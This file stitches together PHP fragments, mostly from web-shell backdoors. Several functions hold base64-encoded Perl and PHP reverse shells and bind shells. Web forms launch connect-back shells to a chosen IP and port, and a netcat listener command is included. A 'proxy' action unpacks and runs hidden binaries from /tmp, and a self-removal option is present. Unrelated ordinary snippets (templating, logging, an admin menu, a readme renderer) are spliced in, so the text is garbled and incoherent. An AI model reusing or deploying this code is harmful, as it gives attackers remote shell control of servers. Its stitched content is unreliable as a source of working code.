private function pageOut($templateName, $t = array()) { //include template for whatever purpose $layout = !empty($GLOBALS['layout']) ? $GLOBALS['layout'] : cf('layouts', 'default'); if (self::get($templateName, 'data') != '') { $t = array_merge($t, include self::get($templateName, 'data')); } if (self::get($templateName, 'stub') == true || self::get($templateName, 'standalone') == true || empty($layout)) { template::plainInclude(self::get($templateName), $t); } else { //what layout should i use? $t['child'] = self::get($templateName); //let the page layout know what to include $t['css'] = array_merge((array) $t['css'], (array) self::get($templateName, 'css'), (array) self::get($layout, 'css')); $t['js'] = array_merge((array) $t['js'], (array) self::get($layout, 'js'), (array) self::get($templateName, 'js')); template::plainInclude(self::get($layout), $t); } }
function log($type, $description) { if ($this->cf['logTo'] != 'nowhere') { if ($this->cf['logTo'] == 'output') { if ($type == 'db' || $type == 'error') { echo "<div style='background: orange; color:black; font-weght:bold'> error ({$type}). {$description} </div>"; } } else { $trace = debug_backtrace(); if (cf('debug') > 2 && in_array($type, array('error', 'db'))) { echo "({$type}) {$description} in " . $this->db->esc($trace[1]['file']) . "on line " . $trace[1]['line'] . "<br />"; } if (cf('debug') > 4) { $GLOBALS['errors']->add("({$type}) {$description}", 'log'); } $this->db->rawQuery("INSERT INTO " . $this->logTable . " SET type=" . $this->db->esc($type) . ", description=" . $this->db->esc($description) . ', file=' . $this->db->esc($trace[1]['file']) . ', line=' . $this->db->esc($trace[1]['line']) . ";") or die("INSERT INTO {$logTable} SET type=" . $this->db->esc($type) . ", description=" . $this->db->esc($description) . ', file=' . $this->db->esc($trace[1]['file']) . ', line=' . $this->db->esc($trace[1]['line']) . ";" . mysql_error($this->db->db)); } } }
unlink("/tmp/back"); } } $_POST['backcconnmsg'] = "Try1ng 70 c0nn3c7 70 <b>" . $_POST['backconnectip'] . "</b> 0n p0r7 <b>" . $_POST['backconnectport'] . "</b>."; } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "C") { if (is_writable(".")) { cf("backc", $bc_c); ex("chmod 777 backc"); $blah = ex("./backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("backc")) { unlink("backc"); } } else { ex("chmod 777 /tmp/backc"); cf("/tmp/backc", $bc_c); $blah = ex("/tmp/backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>."; } @ini_set("max_execution_time", 0); if (!function_exists("gmt")) { function gmt() { list($usec, $sec) = explode(" ", microtime()); return (double) $usec + (double) $sec; } }
} elseif (function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } } return $res; } function cf($fname, $text) { if ($fp = @fopen($fname, 'w')) { @fputs($fp, @base64_decode($text)); @fclose($fp); } } $yourip = "your IP"; $yourport = 'your port'; $usedb = array('perl' => 'perl', 'c' => 'c'); $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; cf('/tmp/.bc', $back_connect); $res = execute(which('perl') . " /tmp/.bc {$yourip} {$yourport} &"); ?>
?> <li>Files<ul> <li><a href="index.php?load=files&action=stats">Files statistics</a></li> <li><a href="index.php?load=files&action=clean">Clean files</a></li> <?php if (user_level(4)) { ?> <li><a href="index.php?load=files&action=edit">Edit file</a></li> <?php } ?> </ul></li> <?php } ?> <li><a href="logout.php">Logout</a></li> </ul> <?php if (!isset($_GET['load'])) { $_GET['load'] = ''; } if (!isset($_GET['action'])) { $_GET['action'] = ''; } if (cf($file = 'admin/amsn.' . basename(strtolower($_GET['load'])) . '.php')) { include_once $file; } else { echo "<p>Please, select an option from the menu</p>\n"; } } //echo '<pre>'; print_r($_SESSION); print_r($_POST); print_r($_GET); print_r($_FILES); echo '</pre>';
function ___onInitializeGlobalClasses() { $db = cf('database'); /** * @global object $GLOBALS['database'] shared database object * @global object $GLOBALS['db'] shorthand for $GLOBALS['database'] * @see database */ $GLOBALS['database'] = new database($db['host'], $db['username'], $db['password'], $db['db']); $GLOBALS['db'] =& $GLOBALS['database']; }
$ip = $_SERVER["REMOTE_ADDR"]; $msg = $_POST['backcconnmsg']; $emsg = $_POST['backcconnmsge']; echo "<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value={$ip}> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>"; echo "{$msg}"; echo "{$emsg}"; } if ($act == "shbd") { $msg = $_POST['backcconnmsg']; $emsg = $_POST['backcconnmsge']; echo "<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>\nBind Port: <input type='text' name='backconnectport' value='5992'>\n<input type='hidden' name='use' value='shbd'>\n<input type='submit' value='Install Backdoor'></form>"; echo "{$msg}"; echo "{$emsg}"; } if ($act == "proxy") { cf("/tmp/hantu.tgz", $proxy_shit); ex("cd /tmp;tar -zxvf hantu.tgz"); ex("cd /tmp;cd .setan;chmod 777 xh"); ex("cd /tmp;cd .setan;chmod 777 httpd"); ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start"); checkproxyhost(); $msg = $_POST['proxyhostmsg']; echo "{$msg}"; unlink("/tmp/hantu.tgz"); ex("cd /tmp; rm -r .setan"); } if ($act == "selfremove") { if ($submit == $rndcode and $submit != "") { if (unlink(__FILE__)) { @ob_clean(); echo "Gone!";
function actionNetwork() { wsoHeader(); $back_connect_perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkg" . "fHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFk" . "ZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7" . "DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVy" . "cm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxu" . "Iik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN" . "Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2Uo" . "U1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_tty_perl = "IyEvdXNyL2Jpbi9wZXJsIC13DQp1c2UgSU86OlNvY2tldDsNCnVzZSBGY250bDsNCiRUSU9DR1BU" . "TiA9IC0yMTQ3MTk5OTUyOyRUSU9DU1BUTENLID0gMTA3NDAyNTUyMTskRUFHQUlOPTExOyRIT1NU" . "PSRBUkdWWzBdOyRQT1JUPSRBUkdWWzFdOyQwPSJhcGFjaGUiOw0KJHNvY2sgPSBuZXcgSU86OlNv" . "Y2tldDo6SU5FVCAoUGVlckFkZHIgPT4gJEhPU1QsUGVlclBvcnQgPT4gJFBPUlQsUHJvdG8gPT4g" . "J3RjcCcsQmxvY2tpbmcgPT4gMCwpIG9yIGRpZSAkITsNCnN5c29wZW4gKFBUTVgsICcvZGV2L3B0" . "bXgnLCBPX1JEV1J8T19OT05CTE9DSykgb3IgZGllICQhOyR0bXA9Jyc7aW9jdGwgKFBUTVgsICRU" . "SU9DR1BUTiwgJHRtcCkgb3IgZGllICQhOw0KJHB0cyA9IHVucGFjaygnaScsICR0bXApOyR1bmxv" . "Y2s9cGFjaygnaScsIDApO2lvY3RsKFBUTVgsICRUSU9DU1BUTENLLCAkdW5sb2NrKSBvciBkaWUg" . "JCE7Y2hkaXIgJy8nIG9yIGRpZSAkITsNCm9wZW4gU1RESU4sICcvZGV2L251bGwnIG9yIGRpZSAk" . "ITt1bWFzayAwO2RlZmluZWQoJHBpZCA9IGZvcmspIG9yIGRpZSAkITtleGl0IGlmICRwaWQ7ZGVm" . "aW5lZCgkcGlkID0gZm9yaykgb3IgZGllICQhOw0KaWYoISRwaWQpe2V4ZWMoIi9zYmluL2dldHR5" . "IC1uIC1sIC9iaW4vYmFzaCAzODQwMCAvZGV2L3B0cy8kcHRzIikgb3IgZXhlYygiL2Jpbi9iYXNo" . "IDwvZGV2L3B0cy8kcHRzID4vZGV2L3B0cy8kcHRzIDI+L2Rldi9wdHMvJHB0cyIpIG9yIGRpZSAk" . "ITsNCmV4aXQ7fW9wZW4gU1RET1VULCAnPj4vZGV2L251bGwnIG9yIGRpZSAkITtvcGVuIFNUREVS" . "UiwgJz4+L2Rldi9udWxsJyBvciBkaWUgJCE7JHBwID0gUFRNWDskcmluPSR3aW49JGVpbj0nJzsN" . "CnZlYygkcmluLGZpbGVubygkcHApLDEpID0xO3ZlYygkcmluLGZpbGVubygkc29jayksMSkgPSAx" . "O3NlbGVjdCAkc29jazskfD0xO3NlbGVjdCBQVE1YOyR8PTE7c2VsZWN0IFNURE9VVDsNCiR8PTE7" . "JGZpbmlzaGVkPTA7c3ViIGZvcndhcmRkYXRhIHtteSAoJGZyb20sJHRvKSA9IEBfO3doaWxlKDEp" . "IHskcnYgPSBzeXNyZWFkKCRmcm9tLCAkYnVmZiwgMTAyNCk7DQpsYXN0IGlmICghZGVmaW5lZCgk" . "cnYpICYmICQhID09ICRFQUdBSU4pO2RlZmluZWQoJHJ2KSBvciBkaWUgJCE7aWYgKCRydiA9PSAw" . "KSB7ICRmaW5pc2hlZCA9IDE7IGxhc3Q7fQ0Kd2hpbGUobGVuZ3RoICRidWZmID4gMCkgeyRydiA9" . "IHN5c3dyaXRlKCR0bywgJGJ1ZmYsIGxlbmd0aCAkYnVmZik7aWYgKCFkZWZpbmVkKCRydikgJiYg" . "JCEgPT0gJEVBR0FJTikge25leHQ7fQ0KZGVmaW5lZCgkcnYpIG9yIGRpZSAkITtsYXN0IGlmICgk" . "cnYgPT0gbGVuZ3RoICRidWZmKTtzdWJzdHIoJGJ1ZmYsMCwkcnYpID0gJyc7fX19d2hpbGUoISAk" . "ZmluaXNoZWQpIHsNCiRuZm91bmQgPSBzZWxlY3QoJHJvdXQ9JHJpbiwgJHdvdXQ9JHdpbiwgJGVv" . "dXQ9JGVpbiwgdW5kZWYpO2RpZSAkISBpZiAoJG5mb3VuZCA9PSAtMSk7Zm9yd2FyZGRhdGEoJHBw" . "LCRzb2NrKTsNCmxhc3QgaWYgJGZpbmlzaGVkO2ZvcndhcmRkYXRhKCRzb2NrLCRwcCk7bGFzdCBp" . "ZiAkZmluaXNoZWQ7fWNsb3NlIFBUTVg7Y2xvc2UgJHNvY2s7JHdvdXQ9JGVvdXQuJHdvdXQuJHJv" . "dXQ7"; $back_connect_php = "PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KJGlwID0gJGFyZ3ZbMV07JHBvcnQgPSAkYXJndlsy" . "XTskc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzskY2h1bmtfc2l6ZSA9IDE0" . "MDA7JHdyaXRlX2EgPSBudWxsOw0KJGVycm9yX2EgPSBudWxsOyRkYWVtb24gPSAwOyRkZWJ1ZyA9" . "IDA7DQppZihmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSl7JHBpZCA9IHBjbnRsX2Zvcmsg" . "KCk7aWYoJHBpZCA9PSAtMSl7cHJpbnRpdCAoJ0VSUk9SOiBDYW5cJ3QgZm9yaycpO2V4aXQoMSk7" . "fQ0KaWYoJHBpZCl7ZXhpdCgwKTt9aWYocG9zaXhfc2V0c2lkICgpID09IC0xKXtwcmludGl0KCdF" . "cnJvcjogQ2FuXCd0IHNldHNpZCgpJyk7ZXhpdCgxKTt9JGRhZW1vbiA9IDE7DQp9ZWxzZXtwcmlu" . "dGl0KCdXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiBUaGlzIGlzIHF1aXRlIGNvbW1vbiBh" . "bmQgbm90IGZhdGFsLicpO30NCmNoZGlyICgnLycpOw0KdW1hc2sgKDApOw0KJHNvY2sgPSBmc29j" . "a29wZW4gKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgew0K" . "cHJpbnRpdCAoInskZXJyc3RyfSAoeyRlcnJub30pIik7DQpleGl0KDEpOw0KfQ0KJGRlc2NyaXB0" . "b3JzcGVjID0gYXJyYXkgKDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLA0KICAgICAgICAgICAgICAg" . "ICAgICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksDQogICAgICAgICAgICAgICAgICAgICAyID0+" . "IGFycmF5KCJwaXBlIiwgInciKSk7DQokcHJvY2VzcyA9IHByb2Nfb3BlbiAoJHNoZWxsLCAkZGVz" . "Y3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlICgkcHJvY2Vzcykpew0KcHJp" . "bnRpdCAoJ0VSUk9SOiBDYW5cJ3Qgc3Bhd24gc2hlbGwnKTsNCmV4aXQgKDEpOw0KfQ0Kc3RyZWFt" . "X3NldF9ibG9ja2luZyAoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcgKCRwaXBl" . "c1sxXSwgMCk7DQpzdHJlYW1fc2V0X2Jsb2NraW5nICgkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3Nl" . "dF9ibG9ja2luZyAoJHNvY2ssIDApOw0KcHJpbnRpdCAoJ1N1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2" . "ZXJzZSBzaGVsbCB0byAnIC4gJGlwIC4gJzonIC4gJHBvcnQpOw0Kd2hpbGUgKDEpIHsNCmlmKGZl" . "b2YgKCRzb2NrKSl7DQogIHByaW50aXQgKCdFUlJPUjogU2hlbGwgY29ubmVjdGlvbiB0ZXJtaW5h" . "dGVkJyk7DQogIGJyZWFrOw0KfQ0KaWYoZmVvZiAoJHBpcGVzWzFdKSl7DQogICBwcmludGl0ICgn" . "RVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCcpOw0KICAgYnJlYWs7DQp9DQokcmVhZF9h" . "ID0gYXJyYXkgKCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29j" . "a2V0cyA9IHN0cmVhbV9zZWxlY3QgKCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7" . "DQppZihpbl9hcnJheSAoJHNvY2ssICRyZWFkX2EpKXsNCiAgaWYgKCRkZWJ1ZykgcHJpbnRpdCAo" . "J1NPQ0sgUkVBRCcpOw0KICAkaW5wdXQgPSBmcmVhZCAoJHNvY2ssICRjaHVua19zaXplKTsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NPQ0s6ICcgLiAkaW5wdXQpOw0KICBmd3JpdGUgKCRwaXBl" . "c1swXSwgJGlucHV0KTsNCn0NCmlmKGluX2FycmF5ICgkcGlwZXNbMV0sICRyZWFkX2EpKXsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NURE9VVCBSRUFEJyk7DQogICRpbnB1dCA9IGZyZWFkKCRw" . "aXBlc1sxXSwgJGNodW5rX3NpemUpOw0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERPVVQ6ICcg" . "LiAkaW5wdXQpOw0KICBmd3JpdGUgKCRzb2NrLCAkaW5wdXQpOw0KfQ0KaWYoaW5fYXJyYXkgKCRw" . "aXBlc1syXSwgJHJlYWRfYSkpew0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERFUlIgUkVBRCcp" . "Ow0KICAkaW5wdXQgPSBmcmVhZCAoJHBpcGVzWzJdLCAkY2h1bmtfc2l6ZSk7DQogIGlmICgkZGVi" . "dWcpIHByaW50aXQoJ1NUREVSUjogJyAuICRpbnB1dCk7DQogIGZ3cml0ZSAoJHNvY2ssICRpbnB1" . "dCk7DQp9DQp9DQpmY2xvc2UgKCRzb2NrKTsNCmZjbG9zZSAoJHBpcGVzWzBdKTsNCmZjbG9zZSAo" . "JHBpcGVzWzFdKTsNCmZjbG9zZSAoJHBpcGVzWzJdKTsNCnByb2NfY2xvc2UgKCRwcm9jZXNzKTsN" . "CmZ1bmN0aW9uIHByaW50aXQoJHN0cmluZyl7aWYoISRkYWVtb24pe3ByaW50ICJ7JHN0cmluZ31c" . "biI7fX0NCj8+IA=="; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBl" . "eGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdld" . "HByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2" . "Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEF" . "SR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywz" . "KSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sU" . "yk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZC" . "AkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQo" . "JCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAi" . "Q2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='443'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g2(null,null,'bcp',this.server.value,this.port.value,this.bcpath.value,this.bctype.value);return false;\"><br>\r\n\t<span>Back-connect</span><br/>\r\n\t<table cellpadding='1' cellspacing='0' width='50%'>\r\n\t<tr><td>Type:</td><td><select name='bctype'><option value='1' >Perl</option><option value='2' >TTY Perl</option><option value='3'>PHP</option></select></td></tr>\r\n\t<tr><td width='1%'>Path:</td><td><input type='text' id='bcpath' name='bcpath' value='/tmp/'> <a href='#' onClick=\"document.getElementById('bcpath').value='" . $_POST['c'] . "'\">or this path</a></td></tr>\r\n\t<tr><td>Server:</td><td><input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "' size='15'>:<input type='text' name='port' value='443' size='4'></td></tr><tr><td><input type=submit value='>>'></td></tr>\r\n\t</table></form><br>"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bpp') { print_r($_POST); exit; cf("/tmp/bp.pl", $bind_port_p); $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>"; unlink("/tmp/bp.pl"); } if ($_POST['p1'] == 'bcp') { switch ($_POST['p5']) { case 1: $back_connect_p = $back_connect_perl; $l = gphp('perl'); break; case 2: $back_connect_p = $back_connect_tty_perl; $l = gphp('perl'); break; case 3: $back_connect_p = $back_connect_php; $l = gphp('php'); break; } $_POST['p4'] = (substr($_POST['p4'], -1, 1) == '/' or substr($_POST['p4'], -1, 1) == '\\') ? trim($_POST['p4']) . 'caches' : trim($_POST['p4']) . '/caches'; cf($_POST['p4'], $back_connect_p); $out = wsoEx($l . " " . $_POST['p4'] . " " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep caches") . "</pre>"; unlink($_POST['p4']); } } echo '</div>'; wsoFooter(); }
function actionNetwork() { wsoHeader(); $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> \n \n <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> \n <span>Bind port to /bin/sh [perl]</span><br/> \n Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n </form> \n <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> \n <span>Back-connect [perl]</span><br/> \n Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n \n </form><br>"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl", $bind_port_p); $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>"; unlink("/tmp/bp.pl"); } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>"; unlink("/tmp/bc.pl"); } } echo '</div>'; wsoFooter(); }
} if (function_exists("apc_store")) { $commit = apc_fetch($project . "/commit"); } if (strlen($commit) > 1) { $commit = json_decode($commit, 1); $commit = $commit["commit"]; $readme .= "### Author\n" . $commit["author"]["name"] . "\n\n"; $date = date("M d, Y", strtotime($commit["committed_date"])); $readme .= "### Last Commit - "; $readme .= $commit["committer"]["name"] . " on {$date}\n\n"; $readme .= $commit["message"] . "\n\n"; $readme .= "#### Changed Files\n\n"; $readme .= cf("Added", $commit, "added", "a"); $readme .= cf("Modified", $commit, "modified", "m"); $readme .= cf("Removed", $commit, "removed", "r"); } } echo Markdown($readme); } else { ?> <h1>Projects</h1> <p> The big bucket of projects! Click a link on the right to browser project details. This is all the open source work we know about thats going on right now. Note that some of these are libraries or tools, some are integration projects, and most are BrowserPlus services. </p> <p>
function yemenconnect() { yemenhead(); $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>"; echo "<form onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>"; echo "<br><form onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $out = yemenEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to " . $_POST['p2'] . ":" . $_POST['p3'] . "<br>Connecting...</pre>"; @unlink("/tmp/bc.pl"); } if ($_POST['p1'] == 'php') { @set_time_limit(0); $ip = $_POST['p2']; $port = $_POST['p3']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; 